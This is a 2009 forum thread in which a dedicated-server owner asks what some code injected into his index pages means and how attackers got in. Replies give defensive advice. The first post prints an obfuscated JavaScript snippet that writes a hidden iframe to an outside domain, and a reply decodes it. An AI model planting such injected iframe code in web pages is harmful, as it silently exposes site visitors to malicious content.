WEB What does this mean and how do I stop it?

Discussion in 'OT Technology' started by upparoom, May 26, 2009.

  1. upparoom

    upparoom OT Supporter

    Joined:
    Jun 4, 2002
    Messages:
    94,036
    Likes Received:
    88
    Location:
    Houston
    somehow, someone keeps injecting code into my index.htm and index.html files on my webserver

they inject even though I set read only permission on the files

it was in CharCode; translated, it comes to this

    Code:
    
    var xew=453800543;var ghg45="nuot";var w="o";var re6="ll.";var h2h="com";var a="ifr";var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'rame>'); var jhr4=4324224
    
    

    anybody tell me what this means?
     
  2. shaitaan

    shaitaan New Member

    Joined:
    Jul 12, 2002
    Messages:
    49,620
    Likes Received:
    0
    Location:
    Bay Area, CA / NYC
    looks like malware :(
     
  3. Insert Tokens

    Insert Tokens Making Cancer My Bitch OT Supporter

    Joined:
    Jan 12, 2006
    Messages:
    8,329
    Likes Received:
    75
    Location:
    Tasmania
    Code:
    <iframe src="http://nuotoll.com/" width="1" height="3"></iframe>
    I'd highly recommend not visiting that site :p
     
  4. upparoom

    upparoom OT Supporter

    Joined:
    Jun 4, 2002
    Messages:
    94,036
    Likes Received:
    88
    Location:
    Houston
I'm mostly trying to figure out how they're getting into my server.

    I have Endpoint on it and I've scanned it with spybot and malwarebytes and found 0 issues.
     
  5. LowClass

    LowClass New Member

    Joined:
    Sep 5, 2007
    Messages:
    890
    Likes Received:
    0
    Location:
    USA
I got the same thing last week on two of my ecommerce sites, both regretfully hosted on 1and1 but on separate servers. I changed every password (site/FTP/client login/etc.) and removed it. It has not come back since.
     
  6. JesterFX

    JesterFX New Member

    Joined:
    Oct 10, 2004
    Messages:
    4,557
    Likes Received:
    0
    Probably just some script somewhere on your server that is outdated and someone is using some exploit to get in.

    I had someone do that on a wordpress site and probably got in through my way outdated VB.
     
  7. tryfuhl

    tryfuhl New Member

    Joined:
    Oct 4, 2003
    Messages:
    75,450
    Likes Received:
    0
    Location:
    MD/DC Metro
    Where are these files being uploaded from? There's newer malware that does this locally and you could be uploading the files without knowing it; be sure to check your files.

    Could easily be an exploited script on your server though.
     
  8. JesterFX

    JesterFX New Member

    Joined:
    Oct 10, 2004
    Messages:
    4,557
    Likes Received:
    0
    Every time it has happened to me I had my host check the logs and they never see anything obviously suspicious. Meaning they are getting in and finding the login info somehow through one of the scripts.

    It's one of the worst parts about having a ton of sites and not enough time to keep all the various scripts updated all the time.
     
  9. Zephyr

    Zephyr New Member

    Joined:
    Jul 30, 2007
    Messages:
    9,557
    Likes Received:
    0
    Location:
    Ahnold Land
How do you people realize this stuff, like an obscure line of code injected into your index page?
     
  10. JesterFX

    JesterFX New Member

    Joined:
    Oct 10, 2004
    Messages:
    4,557
    Likes Received:
    0
When my host emails me and says I need to clean it up lol. Found a few that had that Google warning page that "this site may contain dangerous files" lol.
     
  11. Insert Tokens

    Insert Tokens Making Cancer My Bitch OT Supporter

    Joined:
    Jan 12, 2006
    Messages:
    8,329
    Likes Received:
    75
    Location:
    Tasmania
    Shared hosting or dedi?
     
  12. ge0

    ge0 New Member

    Joined:
    Oct 31, 2005
    Messages:
    8,398
    Likes Received:
    0
    Location:
    JERSEY
Well, if you have anything on your index page that references a URL param, that could be a start.
     
  13. tryfuhl

    tryfuhl New Member

    Joined:
    Oct 4, 2003
    Messages:
    75,450
    Likes Received:
    0
    Location:
    MD/DC Metro
  14. upparoom

    upparoom OT Supporter

    Joined:
    Jun 4, 2002
    Messages:
    94,036
    Likes Received:
    88
    Location:
    Houston
Dedicated. Sitting in a datacenter about 10 miles from me, in a rack I own.
     
  15. upparoom

    upparoom OT Supporter

    Joined:
    Jun 4, 2002
    Messages:
    94,036
    Likes Received:
    88
    Location:
    Houston
  16. Zephyr

    Zephyr New Member

    Joined:
    Jul 30, 2007
    Messages:
    9,557
    Likes Received:
    0
    Location:
    Ahnold Land
So how do you find these things out? Look at the last modified date?
     
  17. dazmanultra

    dazmanultra New Member

    Joined:
    Jun 17, 2002
    Messages:
    34,795
    Likes Received:
    0
    Location:
    English Countryside
Check the FTP logs on the server... find out how the file got there, when it was last modified, etc.

We mainly see these on our systems when users have malware on their PC. We've seen malware that intercepts FTP connections and sniffs the username and password, so even if you're not typing the details it can grab the stuff.

Also, watch where you're accessing your website from. Look out for insecure or untrusted Wi-Fi networks; plain FTP is unencrypted...
     
  18. tryfuhl

    tryfuhl New Member

    Joined:
    Oct 4, 2003
    Messages:
    75,450
    Likes Received:
    0
    Location:
    MD/DC Metro
    regardless, some of the removal/security tactics will remain the same
     
  19. tryfuhl

    tryfuhl New Member

    Joined:
    Oct 4, 2003
    Messages:
    75,450
    Likes Received:
    0
    Location:
    MD/DC Metro
    werd werd

    I got some nasty shit and had to hand clean my files
     
  20. LowClass

    LowClass New Member

    Joined:
    Sep 5, 2007
    Messages:
    890
    Likes Received:
    0
    Location:
    USA
  21. upparoom

    upparoom OT Supporter

    Joined:
    Jun 4, 2002
    Messages:
    94,036
    Likes Received:
    88
    Location:
    Houston
IIS logs don't show anything out of the ordinary around the time this happened. Logon/Logoff doesn't show anyone but the people who can be accounted for.

I'm thinking this could be a virus on someone's machine, so I've asked everyone to run a full scan.

So far I'm keeping an eye on it, but it looks like they haven't changed/tried to change anything in the last 4 days.
     
  22. maxxpower

    maxxpower OG Lauren Crew - Observer OT Supporter

    Joined:
    May 27, 2007
    Messages:
    26,348
    Likes Received:
    0
    do you have any open source apps installed, wordpress, forums etc?
     
  23. 95vr4

    95vr4 OT Supporter

    Joined:
    Oct 6, 2004
    Messages:
    2,513
    Likes Received:
    0
    Location:
    Weddington, NC
    Did you use the M$ Log parser?
     
  24. upparoom

    upparoom OT Supporter

    Joined:
    Jun 4, 2002
    Messages:
    94,036
    Likes Received:
    88
    Location:
    Houston
I'm using vBulletin for forums and WordPress for a blog. Looks like we were able to find the guy with the infection.

    I locked out his account until I get proof of a clean system
     
